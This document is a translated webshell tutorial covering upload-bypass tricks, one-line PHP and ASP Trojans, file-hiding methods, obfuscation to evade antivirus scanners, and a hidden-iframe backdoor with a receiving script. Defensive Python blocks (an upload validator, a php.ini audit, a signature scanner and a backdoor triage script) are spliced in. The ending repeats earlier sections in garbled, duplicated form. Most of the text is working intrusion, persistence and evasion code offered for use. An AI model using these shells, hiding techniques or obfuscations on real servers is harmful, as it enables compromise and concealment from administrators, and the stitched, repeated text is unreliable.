1. What is a webshell
- Introduction to webshell
A webshell, as the name suggests, combines "web" (the web server) and "shell" (a script written in a server-side scripting language). A webshell is a web-based management tool that gives control over the web server; it is also called webadmin. Webshells are generally used by website administrators for website and server management. However, because a webshell is relatively powerful (it can upload and download files, view databases, and even invoke system commands on the server, such as creating users or modifying and deleting files), it is frequently used by attackers. An attacker uses some upload method to place a webshell they wrote in the web server's page directory and then intrudes through page access, or connects to the one-sentence Trojan from their own machine with a client tool and operates on the server directly.
- Classification of webshell
<form action="http://host/path/TEXT.asp" method="post">
<textarea name="|" cols="120" rows="10" width="45">
set lP = server.createObject("Adodb.Stream")   ' create a stream object
lP.Open                                        ' open it
lP.Type = 2                                    ' text mode
lP.CharSet = "gb2312"                          ' character set
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"), 2   ' write the submitted content to newmm.asp; 2 = overwrite the file
lP.Close                                       ' close the object
set lP = nothing                               ' release the object
response.redirect "newmm.asp"                  ' redirect to newmm.asp
</textarea>
<textarea name="newvalue" cols="120" rows="10" width="45">(add the content of the Trojan to generate here)</textarea>
<br><center><br>
<input type="submit" value="submit">
</form>
Da Ma (the "big horse", a full-featured Trojan) works much more simply: there is no distinction between client and server. Some script authors integrated the server side of the one-sentence Trojan directly, so Da Ma is uploaded through an upload vulnerability and its URL is then accessed directly to carry out penetration of the web server from the page. However, some websites impose strict restrictions on uploaded files. Because Da Ma has many functions, it is relatively large and may exceed the website's upload limit. Although the size of Da Ma can be adjusted (for example by copying the code many times, or inserting the code into a garbled file), operating through Xiaoma (the "small horse", the one-sentence Trojan) is more cumbersome: you first upload Xiaoma to obtain a webshell, then upload Da Ma through Xiaoma's connection to take over the server.
2. How to upload a webshell
1. Upload parsing vulnerabilities
(1) IIS directory parsing vulnerability
(2) File parsing vulnerability
For example, xx.asp;.jpg: at upload time the file is recognised as a jpg, but IIS does not parse the characters after the ';', so the file is parsed as an asp file. This vulnerability exists in IIS 5.x/6.0.
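As an added example (not code from the original article), here is a server-side check in Python that rejects the upload-name tricks this section and the ones that follow describe: the IIS 6 ';' truncation (xx.asp;.jpg), the .cer/.cdx/.asa executable extensions, the Apache right-to-left double extension (xx.php.rar), null-byte and trailing-space truncation (1.asp%00.jpg, "1.asp .jpg"), the reserved device names later used for hiding (aux.asp), and an image whose body carries a script tag (the fast-CGI xx.jpg case). The extension lists, the random storage name and every test filename are my own assumptions and constructed values.

```python
"""Upload-name and image-content validator (added example, not the article's
code).  It goes beyond the IIS ';' case and also rejects the other filename
tricks described in the same section.  All filenames and byte strings used
with it are constructed for this example."""
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}           # assumption: an image upload
EXECUTABLE_EXTENSIONS = {"asp", "aspx", "asa", "cer", "cdx", "ashx", "asmx",
                         "php", "php3", "php5", "phtml", "jsp"}
# Windows reserved device names from the article's hiding section.
RESERVED_DEVICE_NAMES = ({"con", "prn", "aux", "nul"}
                         | {f"com{i}" for i in range(1, 10)}
                         | {f"lpt{i}" for i in range(1, 10)})

def validate_upload_name(name):
    """Return (ok, reason).  Every dotted segment is checked, because Apache
    parses extensions right-to-left and IIS 6 stops at ';'."""
    if not name or len(name) > 255:
        return False, "empty or too long"
    # NUL and other control bytes truncate the name in C-based servers; keep to printable ASCII.
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in name):
        return False, "control or non-ASCII character"
    if "/" in name or "\\" in name or ".." in name:
        return False, "path separator"
    if ";" in name or " " in name:
        return False, "semicolon or space (IIS / null-byte truncation pattern)"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    base, exts = parts[0], parts[1:]
    if base in RESERVED_DEVICE_NAMES:
        return False, "reserved device name"
    for ext in exts:                      # xx.php.rar fails here on 'php'
        if ext in EXECUTABLE_EXTENSIONS:
            return False, f"executable extension segment '{ext}'"
    if len(exts) != 1:
        return False, "multiple extensions"
    if exts[0] not in ALLOWED_EXTENSIONS:
        return False, f"extension '{exts[0]}' not allowed"
    return True, "ok"

def safe_storage_name(name):
    """Never store under the client-supplied name: keep only the vetted extension."""
    ok, reason = validate_upload_name(name)
    if not ok:
        raise ValueError(reason)
    return f"{secrets.token_hex(16)}.{name.rsplit('.', 1)[1].lower()}"

IMAGE_MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
               b"GIF87a": "gif", b"GIF89a": "gif"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")

def content_is_clean_image(data, ext):
    """True only if the magic bytes match the claimed extension and no
    server-side script marker appears in the body (the 'image with PHP
    inside' fast-CGI case).  A genuine image can contain these bytes by
    chance; re-encoding the image server-side is the robust alternative."""
    ext = "jpg" if ext == "jpeg" else ext
    if not any(data.startswith(m) and kind == ext for m, kind in IMAGE_MAGIC.items()):
        return False
    return not any(marker in data.lower() for marker in SCRIPT_MARKERS)
```

The order of the checks matters: the truncation patterns are rejected before the name is split, so a NUL or ';' never reaches the extension logic, and every segment is tested rather than only the last one.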
(3) File name parsing
For example, xx.cer / xx.cdx / xx.asa. Under IIS 6.0, .cer, .cdx and .asa files are treated as executable files and the ASP code inside them is executed (.asa is an ASP-specific configuration file; .cer is a certificate file).
(4) fast-CGI parsing vulnerability
When the web server has fast-CGI enabled, upload an image xx.jpg whose content is:
<?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[shell]); ?>'); ?>
The fputs call here creates shell.php and writes the one-sentence Trojan into it. Requesting the path xx.jpg/.php causes the image to be executed as PHP, which generates the one-sentence Trojan shell.php in that directory. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Languages concerned: PHP, Perl, Bourne Shell, C and others.
*Note: fast-CGI is an upgraded version of CGI. CGI is an interface through which the server runs programs to interact with users. fast-CGI is a resident CGI: ordinary CGI must fork a new process every time it is executed, whereas a fast-CGI process keeps running after activation and does not need to fork for every request, so it uses less memory than ordinary CGI.
(5) Apache parsing vulnerability
Apache parses extensions from right to left; if it cannot parse an extension, it moves one extension to the left. Backend upload checks, however, usually look only at the rightmost suffix of the uploaded file. Accordingly, you can name the Trojan xx.php.rar: Apache cannot parse .rar, so it parses the file as PHP, while the upload check sees .rar, thereby bypassing the upload suffix restriction.
2. Truncated upload
When uploading a picture, name it for example "1.asp .jpg" (with a space after asp). Capture the upload form with NC or Burp Suite and replace the space after "asp" with %00 (in Burp Suite you can edit the hex value directly: the hex value of a space is 20; change 20 to 00). Hex 00 means truncation and 20 means a space. With the truncation in place, the script's JPG check is ignored and the ASP file is uploaded directly.
3. Backend database backup
The backend management systems of some enterprises have a database backup function (for example, Southern CMS has one). You can upload a picture that contains a one-sentence Trojan, or rename the Trojan to .jpg, and then use the database backup function to back the picture up as .asp or another extension that is parsed as script; the Trojan can then be executed by requesting it over the web. This method is very old, however; most CMSs have now removed or disabled this backup function.
4. Uploading with database statements
(1) MySQL INTO OUTFILE
This method requires that the website has an injection point, that the current database user has permission to write files, and that the absolute path of the website on the server is known. The method is to use a UNION query to write the one-sentence Trojan into a PHP file under the website directory and then connect to it with the client. The conditions are too harsh, however, and are rarely met in practice.
(2) Writing a Trojan through a new table
Some open-source CMSs and home-made webshells have database management functions that include an SQL query feature. First run create table shell (code text); to create a table named shell containing a column named code of type text. Then run insert into shell(code) values('one-sentence Trojan'); so that the code column of the shell table holds the one-sentence Trojan. Then use the custom backup function to back the table up as x.php;x, which is parsed and executed as PHP. It is not guaranteed that x.php;x will be parsed as PHP: different web servers run different service programs with different filtering rules, and other methods may be needed.
(3) phpMyAdmin misconfiguration
phpMyAdmin is a tool for managing website databases; config.inc.php is its configuration file. If, when viewing the file, the $cfg['Servers'][$i]['auth_type'] parameter is not set (the default is config), no verification is performed when logging in to the database and you can connect to it directly; in some MySQL versions the default login is as root (the administrator), so the login has maximum privileges. Root can generally only log in locally, however, so a remote-login user must be created. After logging in as that remote user, create a table and write the one-sentence Trojan into it.
3. The "security" of webshells
1. Hiding the webshell
When a webshell is uploaded it must be hidden. The first purpose of hiding it is to prevent the website administrator from discovering and deleting it; the second is to prevent other attackers from discovering and using the file.
(1) Hiding Da Ma
① Immortal zombie files
Windows has system reserved names which Windows does not allow to be used for files or folders: aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. Files with these names can nevertheless be created with the Windows copy command, for example:
c:\>copy 3.asp \\.\C:\aux.asp
This creates aux.asp on the C: drive. The file cannot be deleted from the graphical interface; to delete it you must use the del command. There is no prompt after deletion, but the file is indeed gone. Although this method creates a webshell that cannot be deleted through the graphical interface, if it is placed directly in the web root an experienced administrator who sees it will still delete it.
② CLSID hiding
Every program in Windows has a CLSID. If you name a folder x.{program CLSID} and then enter two commands (shown only as images in the original), clicking the created item opens the Control Panel, but in fact the item is still a folder and Da Ma still exists inside it. Naming a folder with the CLSID of a corresponding program can confuse administrators. For example, inside the Recycle Bin folder create such a folder with the Recycle Bin CLSID and copy a reserved-name .asp file into it. You can also use
attrib +h +s +r +d /s /d
to modify the file's attributes and hide it. Windows does not show hidden files by default, and the Recycle Bin folder is created automatically, so an immortal webshell can be hidden on the server this way.
③ Driver hiding technique
The principle is that in the Windows file system, when a folder is opened, the system issues an IRP_MJ_DIRECTORY_CONTROL request. This request allocates a buffer and enumerates the folder's subfolders and files, storing the information obtained in the buffer. During enumeration it looks for matching file names, and if a name matches, the folder or file is skipped. Regarding the bypass principle, I looked at the code; my understanding is that when the target file is reached it adds the file's offset to the enumeration pointer and skips directly over the target without scanning it. Although there is a lot of C source code for this technique on the Internet, it is hard to get working because of header-file and system support (the file systems of different systems differ). I found Easy File Locker on the Internet; the program needs to be installed on the web server and permissions set on the target file.
[image: Easy File Locker permission settings]
Permission settings include readable, writable, deletable, and visible.
[image: the hidden file no longer listed in the folder]
The picture above shows that the file is hidden. As mentioned above, because the enumeration is bypassed directly, the file can still be accessed by its absolute path. My understanding is that the following files are responsible:
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
These four files replace the enumeration query: to access a hidden file, entering the absolute path does not use the normal path lookup but goes through the four files above, which is equivalent to a separate driver for the hidden files.
So as not to be discovered by the administrator, you can uninstall the Easy File Locker program, but you must not delete the four files above. After the program is removed the file can still be accessed by entering its absolute path, which achieves the hiding of the backdoor.
④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. There is a CheckedValue key under this path; change it to 0. If there is no CheckedValue key, create one and assign it the value 0. The hidden files created will then be completely hidden: even if "Show all files" is turned on under Folder Options, they are not displayed.
(2) Hiding a one-sentence Trojan
① Hiding through file inclusion
Some script files on the web contain include statements. You can use this inclusion mechanism to include the one-sentence file, so that the sentence is called directly whenever the page is accessed. ASP uses an include statement (the statement itself is missing from the source text) in which the path is filled in directly; the file path is the path on the web server.
You can use Webmaster Stop to write a one-sentence NTFS-stream pony into an image; after the stream name is written after a ':' in the path, the image no longer displays. Then find an ASP file on the web server and write an include statement at the beginning of it. The PHP include statement is:
<?php include($include); ?>
$include here can be an external path, for example:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
(this relies on the query parameter becoming the variable $include, i.e. register_globals being enabled). The content of 1.php on aaa is
<?php include($include); ?>
which performs the inclusion. bbb is an external server, on the condition that this server must not run PHP; otherwise hehe.php (the one-sentence Trojan) would be executed on the bbb server and not on aaa.
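The remote include just shown only works when php.ini permits include() to load URLs, and the configuration-file trick in the next subsection relies on the prepend/append directives. As an added example that is not part of the original article, the following Python audit parses php.ini text and flags allow_url_include, auto_prepend_file and auto_append_file, plus cgi.fix_pathinfo, which the xx.jpg/.php fast-CGI case from section 2 depends on (PHP's documented default for it is 1). The sample ini text, the hehe.php file name and the Windows path are constructed from the article's values; nothing here is the article's own code.

```python
"""php.ini audit for the directives a hidden one-sentence Trojan relies on
(added example, not the article's code).  The sample ini text below is
constructed; the path and file name mirror the article's example."""

BOOL_ON = {"1", "on", "true", "yes"}

def _strip_comment(line):
    """Drop a ';' comment, but not a ';' inside a double-quoted value
    (include_path uses ';' as its separator)."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            return line[:i]
    return line

def parse_php_ini(text):
    """Minimal php.ini parser: ignores [sections] and comments, strips quotes,
    lower-cases keys.  Returns a dict of directive -> value."""
    settings = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"').strip("'")
    return settings

def audit_php_ini(settings):
    """Return (directive, explanation) pairs for the risky settings."""
    findings = []
    for key in ("auto_prepend_file", "auto_append_file"):
        if settings.get(key):
            findings.append((key, f"every PHP request silently includes {settings[key]}"))
    if settings.get("allow_url_include", "0").lower() in BOOL_ON:
        findings.append(("allow_url_include",
                         "include()/require() accept http:// paths (remote file inclusion)"))
    # PHP's default is 1, so an absent directive counts as enabled.
    if settings.get("cgi.fix_pathinfo", "1").lower() in BOOL_ON:
        findings.append(("cgi.fix_pathinfo",
                         "xx.jpg/.php PATH_INFO requests are handed to PHP (assumes a FastCGI front end)"))
    return findings

# Constructed sample: the article's directives with placeholder file/path values.
SAMPLE_INI = '''
[PHP]
; constructed sample for this example
auto_prepend_file = hehe.php
include_path = "E:\\PHPnow-1.5.6\\htdocs;."
allow_url_include = On
allow_url_fopen = On
cgi.fix_pathinfo = 1
'''

# The same directives set the way a hardened server would have them.
HARDENED_INI = '''
auto_prepend_file =
auto_append_file =
allow_url_include = Off
cgi.fix_pathinfo = 0
'''

if __name__ == "__main__":
    for directive, why in audit_php_ini(parse_php_ini(SAMPLE_INI)):
        print(f"{directive}: {why}")
```

The parser deliberately treats an absent cgi.fix_pathinfo as enabled, so a php.ini that never mentions it still produces a finding; the HARDENED_INI text shows the values that make the audit come back empty.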
② Hiding a one-sentence Trojan in the configuration file (PHP)
After obtaining a PHP webshell you can use php.ini to hide the file by editing the configuration. One of its functions is to prepend or append the contents of a given file to every page (a header and footer): auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;.": this setting gives the locations where the header and footer files are looked up. The rule is "path1;path2", meaning the header and footer files in the folder path1 are added to the files in the path; the '.' here indicates the root path, which is equivalent to adding them to the homepage. Then write the one-sentence Trojan in the hehe.php file, and through PHP's prepend function the sentence is added to the website's homepage.
③ 404 pony
A 404 pony shows a "page does not exist" 404 page when accessed, but the Trojan code has in fact already been executed. Generally it can be brought up by pressing Shift five times.
4. Anti-detection for one-sentence webshells
1. Construction method to bypass detection (PHP)
General detection programs filter strings such as "_POST", "system" and "call_user_func_array". Sometimes a construction method can be used to bypass such detection. The basic principle is that every character in PHP has a binary value, so with XOR each character of the Trojan can be replaced by the XOR of two other characters. For example:
<?php
@$_++;               // $_ is undefined; ++ makes it 1
$__ = ("#" ^ "|");   // '_'
$__ = ("." ^ "~");   // 'P'
$__ = ("/" ^ "`");   // 'O'
$__ = ("|" ^ "/");   // 'S'
$__ = ("{" ^ "/");   // 'T'
With this construction the one-sentence Trojan can be written as
<?php
@$_++;
$__ = ("#" ^ "|") . ("." ^ "~") . ("/" ^ "`") . ("|" ^ "/") . ("{" ^ "/");   // $__ is now "_POST"
@${$__}[!$_](${$__}[$_]);   // equivalent to @$_POST[0]($_POST[1])
?>
!$_ is the negation of 1; in PHP 1 is true and its negation is 0 (false). This bypass is quite weak, however. Thinking it through, even though each character is replaced by the XOR of two characters, the binary value of
("#" ^ "|") . ("." ^ "~") . ("/" ^ "`") . ("|" ^ "/") . ("{" ^ "/")
is still detected: a scanner that evaluates the hexadecimal codes will still kill it.
2. Regular expression replacement method (PHP)
PHP has the function preg_replace(), which performs regular-expression replacement. Using replacement to bypass detection also relies on a feature of the PHP language: when the function is called with the e modifier, if the value substituted into the replacement contains a command, the command is executed.
<?php
function funfunc($str) {
}
echo preg_replace("/(.+?)/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
The code above is a replacement process. First an empty function is created, then preg_replace replaces the content captured by the pattern (here, the HTML title) in the cmd form field with a call to funfunc. If the value in the POST form is written as
{${phpinfo()}}
(phpinfo() can of course be replaced with other commands), then after replacement it becomes funfunc("{${phpinfo()}}"). Since ${} evaluates the content inside {}, phpinfo() is executed.
3. Instant generation method (PHP)
When file inclusion is used, the included PHP file is easily found by scanners. In that case you can use file_put_contents to create a PHP file with the one-sentence Trojan written in it, generating the Trojan just before it is accessed. This function is sensitive, however, and is easily killed.
4. Evasion method (ASP)
Because some ASP servers filter the usual one-sentence form, you can use:
<script language="VBScript" runat="server"> execute request("cmd") </script>
The function is the same; only the form changes. Evasion by using a different script language: an ASPX one-sentence Trojan
<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </script>
Here the one-sentence Trojan is written in C#.
5. Splitting method (ASP)
Split the statement into two parts. Although the chance of bypassing is small, it is still a bypass technique: some servers apply many sophisticated scanning methods but miss small issues. There is also an enhanced version of splitting:
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
The two statements above use an if to separate the parts. The central idea is to split the sensitive characters: the usual ASP signature is eval(request or execute(request, and once split the signature is not detected and the code passes straight through.
6. Garbled transformation (ANSI->Unicode encoding)
<%eval request("#")%>
is transformed into "┼攠數畣整爠煥敵瑳∨∣┩愾"
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
The line above uses ASCII encoding: chr(114) stands for the character with ASCII code 114, i.e. "r". After conversion the code above becomes
<%eval(eval(request("brute"))%>
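The one-sentence variants in sections 1 to 6 above, and the base64/gzinflate/rot13 wrappers in section 7 below, all defeat a scanner that only matches signatures on the outer layer of the file. As an added example that is not from the original article, here is a Python scanner that peels those wrappers (base64_decode, gzinflate, str_rot13, strrev) and folds chr() concatenations before re-running its signature list on each decoded layer. The signature names, the sample snippets (modelled on the article's code) and the decoding-depth limit are my own constructions.

```python
"""Layered webshell signature scanner (added example, not the article's
code).  Every sample snippet below is constructed for this example."""
import base64
import codecs
import re
import zlib

# Signatures for the one-sentence forms discussed in the article.
SIGNATURES = {
    "eval_of_request": re.compile(
        r"eval\s*\(\s*(?:\$_(?:POST|GET|REQUEST)\b|[\"']?request\b)", re.I),
    "execute_of_request": re.compile(r"execute\s*\(?\s*request\s*\(", re.I),
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*[\"']/.*?/[a-zA-Z]*e[a-zA-Z]*[\"']", re.I | re.S),
    "variable_variable_call": re.compile(r"\$\{\$\w+\}\s*\["),
    "xor_built_string": re.compile(
        r"(?:\(?\s*[\"'].[\"']\s*\^\s*[\"'].[\"']\s*\)?\s*\.?\s*){3,}"),
    "chr_concatenation": re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*[+.]\s*){3,}", re.I),
}

# A chain of decoder calls around one string literal, e.g. gzinflate(base64_decode('...')).
# Group 1 holds the function names outermost-first, group 2 the literal.
WRAPPER_CHAIN = re.compile(
    r"((?:(?:base64_decode|gzinflate|str_rot13|strrev)\s*\(\s*)+)"
    r"[\"']([^\"']*)[\"']\s*\)+", re.I)
CHR_CALL = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.I)
CHR_RUN = re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*[+.]?\s*){2,}", re.I)

def _decode_layer(names, literal):
    """Apply the decoders innermost-first, mirroring PHP's evaluation order."""
    data = literal
    for name in reversed(names):
        name = name.lower()
        if name == "base64_decode":
            data = base64.b64decode(data).decode("latin-1")
        elif name == "gzinflate":            # raw DEFLATE, no zlib header
            data = zlib.decompress(data.encode("latin-1"), -15).decode("latin-1")
        elif name == "str_rot13":
            data = codecs.encode(data, "rot_13")
        elif name == "strrev":
            data = data[::-1]
    return data

def fold_chr(text):
    """Replace chr(n)+chr(m)... runs with the quoted literal they build."""
    return CHR_RUN.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in CHR_CALL.findall(m.group(0))) + '"',
        text)

def scan(text, depth=0, max_depth=5):
    """Return (signature, depth) pairs found in the text and in every layer
    that can be decoded out of it.  depth 0 is the file as stored."""
    hits = []
    folded = fold_chr(text)
    for name, pattern in SIGNATURES.items():
        if pattern.search(text) or pattern.search(folded):
            hits.append((name, depth))
    if depth < max_depth:
        for m in WRAPPER_CHAIN.finditer(text):
            names = re.findall(r"[a-z_0-9]+", m.group(1), re.I)
            try:
                inner = _decode_layer(names, m.group(2))
            except (ValueError, zlib.error):     # not really encoded data
                continue
            hits.extend(scan(inner, depth + 1, max_depth))
    return hits

def _deflate_base64(s):
    """What PHP's base64_encode(gzdeflate($s)) produces (used to build a sample)."""
    co = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(co.compress(s.encode()) + co.flush()).decode()

# Constructed samples modelled on the article's snippets.
SAMPLES = {
    "gzinflate_base64": "<?php @eval(gzinflate(base64_decode('%s'))); ?>"
                        % _deflate_base64("<?php eval($_POST['shell']); ?>"),
    "rot13_layer": "<?php eval(str_rot13('%s')); ?>" % codecs.encode("eval($_POST[x]);", "rot_13"),
    "asp_chr": 'eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))',
    "xor_construct": '$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]);',
    "preg_e": 'preg_replace("/(.+?)/ies", \'funfunc("\\1")\', $_POST["cmd"]);',
    "benign": "<?php echo htmlspecialchars($_POST['name']); ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, scan(src))
```

The depth value in each hit is the detection-relevant part: a hit at depth 1 or more means the outer file never matched and only the decoded content did, which is exactly the blind spot the article's encoding tricks exploit.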
7. Anti-detection for Da Ma
(1) base64 encoding
Da Ma can be protected from detection by compressing its code, base64-encoding the compressed result, and then appending to the end of the Da Ma code:
<?php @eval(gzinflate(base64_decode($code))); ?>
which executes the script. The $code variable holds the base64 text; at execution time it is first decompressed by gzinflate and then run by eval. In fact this does not truly evade detection: base64_decode and eval are themselves on the signature list, so the file is still killed when it passes through a scanner.
(2) ROT13 encoding (PHP)
str_rot13 is a PHP encoding function that can be used to encode script code to bypass signature detection, for example: [image: str_rot13 / strrev wrapped decoder]. The strrev function in the picture reverses a string. To escape signature detection the characters are deliberately separated with '.' signs. The three strings encoded with str_rot13 in the picture are gzinflate, str_rot13 and base64_decode in that order, which amounts to triple encoding and avoids the two signatures gzinflate and base64_decode. str_rot13 itself is not avoided, however, and some anti-virus software may also use str_rot13 as a signature. ROT13 means rotation by 13: each character's position in the alphabet is shifted by 13 to encode it, and encoding twice returns the original value. Because the algorithm is fixed, the encoding strength is weak and cracking it is extremely simple: just encode it once more.
(3) Other encodings
Anti-virus software and scanners generally use signatures to decide whether a file is malicious. When doing anti-detection work on Da Ma, a pony or a one-sentence Trojan, PHP or ASP encoding functions (such as base64, rot13 and so on) are usually used to bypass scanners. I think you can instead write your own encoding algorithm and use it to encode the script code, which bypasses some signatures. You can borrow ideas from encryption methods such as the Caesar cipher and shift ciphers, write an algorithm, and encode the script code with it; signatures such as base64 and rot13 then disappear. Alternatively, without much trouble, use a home-made algorithm to encrypt just the signature strings and decrypt them when used. You can also use keyed algorithms such as DES and RSA. Da Ma generally has a password login box; you can tie the login password to the decryption key, so that the code can only be parsed after the correct password is entered. On the one hand this avoids detection by scanners and anti-virus software; on the other hand it is convenient, because even if someone else obtains this Da Ma they cannot decrypt it and see the source code.
5. About webshell backdoors
Da Ma downloaded from the Internet generally has more or less backdoors in it. These backdoors lead directly to the website we obtained being taken over by others, so Da Ma downloaded online must first be checked for backdoors. For example, the universal password here:
end function
if session("hehe") = "" then
  if request.form("pass") = userpass or request.form("pass") = "1111111" then
    session("hehe") = userpass
    response.redirect url
  else
Here
request.form("pass") = userpass
was originally used to verify the value of pass: if the entered pass equals userpass, verification succeeds. But the later
or request.form("pass") = "1111111"
means that if the entered pass is 1111111 you can also log in to Da Ma. Of course, it is not always this simple. The original author may give userpass two values and add a trigger condition that changes userpass when someone logs in (for example, a failed login triggers an update of the userpass value, such as adding a suffix), and the trigger code and the verification code are far apart and hard to find. In that case the Da Ma code must be analysed line by line.
Then the Trojan is mounted with a frame:
<iframe src="backdoor address" width=0 height=0></iframe>
Here the frame's width and height are set to 0, so the page is hidden. The "backdoor address" points to your own receiving script, which you place on a public server you control. The receiving script is as follows:
<%
url = Request.ServerVariables("HTTP_Referer")
set fs = server.CreateObject("Scripting.FileSystemObject")
set file = fs.OpenTextFile(server.MapPath("hehe.txt"), 8, True)
file.writeline url
file.close
set file = nothing
set fs = nothing
%>
where
url = Request.ServerVariables("HTTP_Referer")
reads the Referer of the request, i.e. the URL of the Da Ma page, which is then appended to hehe.txt in the current directory.
To remove this kind of backdoor, first break the second password check in Da Ma (the master password) by deleting the related code, then check whether the ASP Da Ma page contains a hidden URL such as width=0 height=0, find it and delete it.
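The two backdoor patterns described in this section are also exactly what an incident responder looks for when triaging a webshell recovered from a compromised server: the hard-coded second password, the zero-size call-home frame, and a password variable reassigned far from the login check. As an added example that is not the article's code, here is a Python triage script for ASP big-horse source; the ASP sample is constructed from the article's snippet, the host name is a placeholder, and the "statement starts with the variable" rule for telling VBScript assignments from comparisons is my own heuristic.

```python
"""Triage of recovered ASP webshell source for the backdoor patterns the
article describes (added example, not the article's code).  The ASP sample
below is constructed; the host name is a placeholder."""
import re

# "... or request.form("pass") = "<literal>"": a second, hard-coded password.
ALT_PASSWORD = re.compile(
    r"\bor\s+request(?:\.form)?\s*\(\s*[\"']pass\w*[\"']\s*\)\s*=\s*([\"'][^\"']+[\"'])", re.I)
# Zero-size or CSS-hidden iframes: the call-home frame.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:\b(?:width|height)\s*=\s*[\"']?0\b|display\s*:\s*none"
    r"|visibility\s*:\s*hidden)[^>]*>", re.I)
IFRAME_SRC = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# The variable the typed password is compared against.
PASSWORD_COMPARE = re.compile(
    r"request(?:\.form)?\s*\(\s*[\"']pass\w*[\"']\s*\)\s*=\s*([A-Za-z_]\w*)", re.I)

def find_alt_passwords(src):
    """Every literal OR'd into the password check."""
    return [m.group(1) for m in ALT_PASSWORD.finditer(src)]

def find_hidden_iframes(src):
    """The src of every hidden iframe ('<no src>' if it has none)."""
    out = []
    for m in HIDDEN_IFRAME.finditer(src):
        s = IFRAME_SRC.search(m.group(0))
        out.append(s.group(1) if s else "<no src>")
    return out

def find_password_reassignments(src):
    """1-based line numbers on which the password variable is assigned.
    Heuristic: VBScript uses '=' for both assignment and comparison, so a
    statement that *starts* with the variable is treated as an assignment."""
    m = PASSWORD_COMPARE.search(src)
    if not m:
        return []
    assign = re.compile(r"^\s*" + re.escape(m.group(1)) + r"\s*=", re.I | re.M)
    return [src.count("\n", 0, a.start()) + 1 for a in assign.finditer(src)]

def triage(src):
    return {
        "alt_passwords": find_alt_passwords(src),
        "hidden_iframes": find_hidden_iframes(src),
        "password_assign_lines": find_password_reassignments(src),
    }

# Constructed sample: the article's login check plus the hidden frame and a
# delayed reassignment of the password variable.  The host is a placeholder.
SAMPLE_ASP = '''<%
userpass = "s3cret"
' ... many lines of ordinary shell code ...
function login()
  if session("hehe") = "" then
    if request.form("pass") = userpass or request.form("pass") = "1111111" then
      session("hehe") = userpass
      response.redirect url
    else
      userpass = userpass & "x"   ' changed on a failed login, far from line 2
    end if
  end if
end function
%>
<iframe src="http://backdoor.example.invalid/collect.asp" width=0 height=0></iframe>
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_ASP).items():
        print(f"{key}: {value}")
```

More than one line in password_assign_lines is the signal the article describes in prose: the variable compared against the login form is written again somewhere other than its declaration.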
The above has introduced the implementation and hiding of webshells and the aspects involved. I hope it is helpful to friends who are interested in PHP tutorials.
(4)fast-CGI parsing vulnerability
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
Default
1
fputs(fopen('shell.php', 'w' ),'eval($_POST[shell])?>');?>
The fput used here creates a shell.php file and writes a sentence. Accessing the path xx.jpg/.php will generate a one-sentence Trojan shell.php in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Locale: PHP, prel, Bourne Shell, C and other languages.
*Note: fast-CGI is an upgraded version of CGI. CGI refers to an interface that provides human-computer interaction on the server. fast-CGI is a resident CGI. Because CGI needs to use fork to start a process every time it is executed, but fast-CGI is always executed after activation, and there is no need to fork a process for every request. It takes up less memory than ordinary CGI. (5) Apache parsing vulnerabilityThe way Apache parses is from right to left. If the parsing cannot be successful, it will want to move one to the left. However, background upload usually looks at the rightmost suffix of the uploaded file, so according to For this, you can name the horse xx.php.rar, because apache cannot parse rar, so it parses it as php, but the background upload point parses it as rar, thus bypassing the upload file suffix restriction 2. Truncate the upload
When uploading a picture, for example, name it 1.asp .jpg (there is a space after asp). When uploading, use NC or burpsuite to capture the form, and add %00 after the upload name asp (in burpsuite You can directly edit the HEX value in it. The HEX value of a space is 20. Change 20 to 00). If HEX is 00, it means truncation, and 20 means a space. If it means truncation, it means ignoring the JPG verification statement in the script and directly Upload ASP. 3. Backend database backup
